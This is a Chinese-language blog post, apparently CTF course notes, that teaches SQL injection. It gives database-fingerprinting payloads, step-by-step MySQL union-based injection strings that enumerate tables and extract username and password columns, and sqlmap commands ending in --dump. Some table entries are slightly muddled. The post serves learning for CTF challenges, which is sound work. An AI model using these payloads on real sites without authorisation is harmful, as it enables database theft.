<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>SQL注入 | H4d3s&#39; Blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="本节课用到工具：kalilinux sqlmap 脑子sql注入  SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严，攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句，在管理员不知情的情况下实现非法操作，以此来实现欺骗数据库服务器执行非授权的任意查询，从而进一步得到相应的数据信息  什么是SQL？ SQL全称是结构化查询语言，即Structured">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入">
<meta property="og:url" content="https://h4d3s-web.github.io/2022/07/27/SQL%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="H4d3s&#39; Blog">
<meta property="og:description" content="本节课用到工具：kalilinux sqlmap 脑子sql注入  SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严，攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句，在管理员不知情的情况下实现非法操作，以此来实现欺骗数据库服务器执行非授权的任意查询，从而进一步得到相应的数据信息  什么是SQL？ SQL全称是结构化查询语言，即Structured">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img2018.cnblogs.com/blog/1309874/201909/1309874-20190920223556899-1794650656.png">
<meta property="article:published_time" content="2022-07-27T07:54:15.000Z">
<meta property="article:modified_time" content="2022-07-27T07:55:00.026Z">
<meta property="article:author" content="H4d3s">
<meta property="article:tag" content="web ctf">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img2018.cnblogs.com/blog/1309874/201909/1309874-20190920223556899-1794650656.png">
  
    <link rel="alternate" href="/atom.xml" title="H4d3s' Blog" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 6.1.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<link rel="stylesheet" href="/css/prism.css" type="text/css"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">H4d3s&#39; Blog</a>
      </h1>
      
        <h2 id="subtitle-wrap">
          <a href="/" id="subtitle">Be Mild</a>
        </h2>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS 订阅"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="搜索"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="搜索"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://h4d3s-web.github.io"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-SQL注入" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2022/07/27/SQL%E6%B3%A8%E5%85%A5/" class="article-date">
  <time class="dt-published" datetime="2022-07-27T07:54:15.000Z" itemprop="datePublished">2022-07-27</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      SQL注入
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h5 id="本节课用到工具：kalilinux-sqlmap-脑子"><a href="#本节课用到工具：kalilinux-sqlmap-脑子" class="headerlink" title="本节课用到工具：kalilinux sqlmap 脑子"></a>本节课用到工具：kalilinux sqlmap 脑子</h5><h2 id="sql注入"><a href="#sql注入" class="headerlink" title="sql注入"></a>sql注入</h2><blockquote>
<p> <strong>SQL注入</strong>是指web应用程序对用户输入数据的合法性没有判断或过滤不严，攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句，在管理员不知情的情况下实现非法操作，以此来实现欺骗数据库服务器执行非授权的任意查询，从而进一步得到相应的数据信息</p>
</blockquote>
<h4 id="什么是SQL？"><a href="#什么是SQL？" class="headerlink" title="什么是SQL？"></a>什么是SQL？</h4><blockquote>
<p>SQL全称是结构化查询语言，即Structured Query Language，是一种特殊目的的编程语言，是一种数据库查询和程序设计语言，<em>类比C++，python</em>，并且在各大数据库软件中有语法差异</p>
</blockquote>
<p>常见的数据库软件：access mssql  mysql oracle multl</p>
<table>
<thead>
<tr>
<th>数据库</th>
<th>注入语句</th>
<th>原理</th>
<th>用处</th>
</tr>
</thead>
<tbody><tr>
<td>access</td>
<td>and user&gt;0</td>
<td>user是mssql内置变量，类型为nvarchar；nvarchar与int比较会报错</td>
<td>msqql和access报错不一样可区分数据库是mssql还是access</td>
</tr>
<tr>
<td>mssql</td>
<td>and (select count(<em>) from sysobjects) &gt;= 0and (select count(</em>) from msysobjects) &gt;= 0</td>
<td>mssql存在sysobjects不存在msysobjects，上句不会报错下句会报错access不存在sysobjects存在msysobjects，上句会报错下句不会报错</td>
<td>可用于确认数据库是mssql还是access</td>
</tr>
<tr>
<td>mysql</td>
<td>select @@versionselect database()</td>
<td>@@version是mysql的内置变量database()是mysql的内置函数</td>
<td>如果返回正常则说明是oracle</td>
</tr>
<tr>
<td>oracle</td>
<td>and exists(select * from dual)and (select count(*) from user_tables)&gt;0 –</td>
<td>dual和user_tables是oracle的系统表</td>
<td>如果返回正常则说明是oracle</td>
</tr>
<tr>
<td>multl</td>
<td>/*–;</td>
<td>mysql支持的注释mssql和oracle支持的注释oracle不支持多行</td>
<td>报错说明不是mysql不报错可能是mssql或oracle报错极有可能是orac</td>
</tr>
</tbody></table>
<p><img src="https://img2018.cnblogs.com/blog/1309874/201909/1309874-20190920223556899-1794650656.png" alt="img"></p>
<h2 id="针对Mysql-入门sql注入-php网站常用数据库"><a href="#针对Mysql-入门sql注入-php网站常用数据库" class="headerlink" title="针对Mysql  入门sql注入(php网站常用数据库)"></a>针对Mysql  入门<strong>sql注入</strong>(php网站常用数据库)</h2><p><code>1、数据库(database)：是一些表的集合，众多的数据表组成了一个数据库；</code>（爆库名）<br><code>2、数据表：与常见的表格是一样的，用来存储数据的二维表格；</code><br><code>3、行(row)：熟知的表格中的一行数据（元组）或一条记录；</code><br><code>4、列(column): 熟知的表格中的一列，具有相同数据类型的数据的集合，也称为属性或字段；</code>(爆字段)<br><code>5、键(key): 键的值在当前列中具有唯一性；</code><br><code>6、值(value): 行的具体信息, 每个值必须与该列的数据类型相同；</code><br><code>7、表头(header): 每一列的名称；</code></p>
<p><code>Ps1：按照数据类型分类</code> 1)<strong>数字型</strong> 2)<strong>字符型</strong> 3)搜索型 </p>
<p><code>Ps2：按照提交方式分类</code> 1)<strong>GET型</strong> 2)<strong>POST型</strong> 3)Cookie型 \4) Http请求头注入</p>
<p> <code>Ps3：按照执行效果分类</code> 1)<strong>联合查询</strong> 2)报错注入3)盲注 \4) 堆查询注入</p>
<p><strong>流程：</strong>找注入点-&gt;判断列数-&gt;找回显位置-&gt;获取数据库名-&gt;获取指定数据库下所有表名-&gt;获取表中字段名-&gt;获取数据</p>
<p><code>（类比EXCEL）</code></p>
<p><strong>①万能密码寻找注入点，判断注入类型（字符型or数字型）</strong></p>
<p>payload:  （注：payload和exp一样都是ctf用词，表示有效负载，可以简单理解为“参考答案”）</p>
<figure class="highlight sql"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span><span class="string">' or 1=1 #        /*字符型注入*/</span></span><br><span class="line"><span class="string">1 and 1=2 #         /*数字型注入*/</span></span><br></pre></td></tr></tbody></table></figure>

<figure class="highlight sql"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">tip: <span class="keyword">SQL</span>注入<span class="operator">-</span>万能密码的注入原理(看不看都行，但是可以帮助理解)</span><br><span class="line"><span class="operator">/</span><span class="operator">/</span>用户登陆时，后台执行的数据库查询操作</span><br><span class="line"><span class="keyword">Select</span> user_id,user_type,email <span class="keyword">From</span> users <span class="keyword">Where</span> user_id<span class="operator">=</span><span class="string">'用户名'</span> <span class="keyword">And</span> password<span class="operator">=</span><span class="string">'密码'</span> #字符型</span><br><span class="line"><span class="keyword">Select</span> user_id,user_type,email <span class="keyword">From</span> users <span class="keyword">Where</span> user_id<span class="operator">=</span>用户名 <span class="keyword">And</span> password<span class="operator">=</span><span class="string">'密码'</span> #数字型</span><br></pre></td></tr></tbody></table></figure>

<p><strong>②判断列数</strong>（order by）</p>
<blockquote>
<p>限制因素：union函数进行联合查询的条件：union前面查询语句查询的元素需要和后面拼接的查询语句查询元素数量一致(即为后面的步骤铺垫)</p>
</blockquote>
<p>payload: </p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">admin' order by 1 #</span><br><span class="line">admin' order by 2 #</span><br><span class="line">admin' order by 3 #</span><br><span class="line">...(尝试到有不一样结果比如”列数不存在“)</span><br></pre></td></tr></tbody></table></figure>

<p><strong>③找回显位置（union查找）</strong></p>
<blockquote>
<p>目的：后端代码可能查询n个字段位数，但是显示给前端的只有m个字段位数（m&lt;n），攻击者需要确定哪些位是能看到回显信息的，不然攻击时获取关键信息就很难受</p>
</blockquote>
<p>payload：</p>
<figure class="highlight sql"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">-1</span><span class="string">' union select 1,2,3 #   (1,2,3根据前面列数自行填补)</span></span><br></pre></td></tr></tbody></table></figure>

<blockquote>
<p>设置id=-1’原因：我们发现前端页面只输出一条记录，因此攻击者利用联合查询函数时为了判断是哪几位可用，并输出到页面提示，就需要设置union前面的查询结果为假，这样自然数据库返回的就是后一条我们攻击者sql注入的查询结果；所以union后面使用selcet 1,2,3时，返回2,3即表示第2,3位为可用的显示位。</p>
</blockquote>
<p><strong>④爆数据库版本、数据库名</strong></p>
<p>payload：</p>
<figure class="highlight sql"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">-1</span><span class="string">' union select 1,database(),version() # （还是根据前面回显位置插入函数）</span></span><br></pre></td></tr></tbody></table></figure>

<blockquote>
<p>version()函数：获取当前数据库版本信息<br>database()函数：获取当前数据库名</p>
<p>Ps:通过此步可以判断数据库是否具有information_schema基本架构库：mysql5.0以上版本特有，5.0以下版本没有</p>
</blockquote>
<p><strong>⑤爆数据库表名、数据库属性字段列名、关键敏感数据信息</strong></p>
<p>payload：</p>
<figure class="highlight sql"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">爆表名： <span class="number">-1</span><span class="string">' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='</span>数据库名<span class="string">' # </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">爆字段名： -1'</span><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,group_concat(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema<span class="operator">=</span><span class="string">'数据库名'</span><span class="keyword">and</span> table_name<span class="operator">=</span><span class="string">'表名'</span> #</span><br><span class="line"></span><br><span class="line">爆关键敏感数据信息： <span class="number">-1</span><span class="string">' union select 1,2,group_concat(字段名) from 数据库名.表名 #</span></span><br><span class="line"><span class="string">也可以拆开 -1'</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,group_concat(username),group_concat(password) <span class="keyword">from</span> 数据库名.表名 #</span><br></pre></td></tr></tbody></table></figure>

<p>例题：</p>
<h5 id="极客大挑战-2019-EasySQL"><a href="#极客大挑战-2019-EasySQL" class="headerlink" title="[极客大挑战 2019]EasySQL"></a>[极客大挑战 2019]EasySQL</h5><h5 id="极客大挑战-2019-LoveSQL"><a href="#极客大挑战-2019-LoveSQL" class="headerlink" title="[极客大挑战 2019]LoveSQL"></a>[极客大挑战 2019]LoveSQL</h5><h5 id="极客大挑战-2019-BabySQL-需用到绕过技巧"><a href="#极客大挑战-2019-BabySQL-需用到绕过技巧" class="headerlink" title="[极客大挑战 2019]BabySQL (需用到绕过技巧)"></a>[极客大挑战 2019]BabySQL (需用到绕过技巧)</h5><h5 id="第一章-web入门-SQL注入"><a href="#第一章-web入门-SQL注入" class="headerlink" title="[第一章 web入门]SQL注入"></a>[第一章 web入门]SQL注入</h5><h2 id="sqlmap注入操作"><a href="#sqlmap注入操作" class="headerlink" title="sqlmap注入操作"></a>sqlmap注入操作</h2><p>以**[第一章 web入门]SQL注入**为例<br>按照注入流程↓<br>1判断注入点</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap <span class="literal">-u</span> <span class="string">"url"</span> <span class="literal">--batch</span></span><br></pre></td></tr></tbody></table></figure>

<p>2获取数据库名</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap <span class="literal">-u</span> <span class="string">"url"</span> <span class="literal">--batch</span> <span class="literal">--dbs</span></span><br></pre></td></tr></tbody></table></figure>

<p>3获取指定数据库下所有表名</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap <span class="literal">-u</span> <span class="string">"url"</span> <span class="literal">--batch</span> <span class="literal">-D</span> 数据库名 <span class="literal">--tables</span></span><br></pre></td></tr></tbody></table></figure>

<p>4获取表中字段名</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap <span class="literal">-u</span> <span class="string">"url"</span> <span class="literal">--batch</span> <span class="literal">-D</span> 数据库名 <span class="literal">-T</span> 表名 <span class="literal">--column</span></span><br></pre></td></tr></tbody></table></figure>

<p>5获取数据</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap <span class="literal">-u</span> <span class="string">"url"</span> <span class="literal">--batch</span> <span class="literal">-D</span> 数据库名 <span class="literal">-T</span> 表名 <span class="literal">-C</span> 字段<span class="number">1</span>,字段<span class="number">2</span>…… <span class="literal">--dump</span></span><br></pre></td></tr></tbody></table></figure>



<p>更详细的内容可以参考：</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_43531669/article/details/113835025">https://blog.csdn.net/qq_43531669/article/details/113835025</a></p>
</blockquote>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://h4d3s-web.github.io/2022/07/27/SQL%E6%B3%A8%E5%85%A5/" data-id="cl63baydd0001ywuig99qbs1m" data-title="SQL注入" class="article-share-link">分享</a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2022/05/23/%E6%88%91%E7%9A%84%E5%82%BB%E6%86%A8%E6%86%A8/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">后一篇</strong>
      <div class="article-nav-title">我的傻憨憨</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">归档</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/07/">七月 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/05/">五月 2022</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2022/07/27/SQL%E6%B3%A8%E5%85%A5/">SQL注入</a>
          </li>
        
          <li>
            <a href="/2022/05/23/%E6%88%91%E7%9A%84%E5%82%BB%E6%86%A8%E6%86%A8/">我的傻憨憨</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2022 H4d3s<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.4.1.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>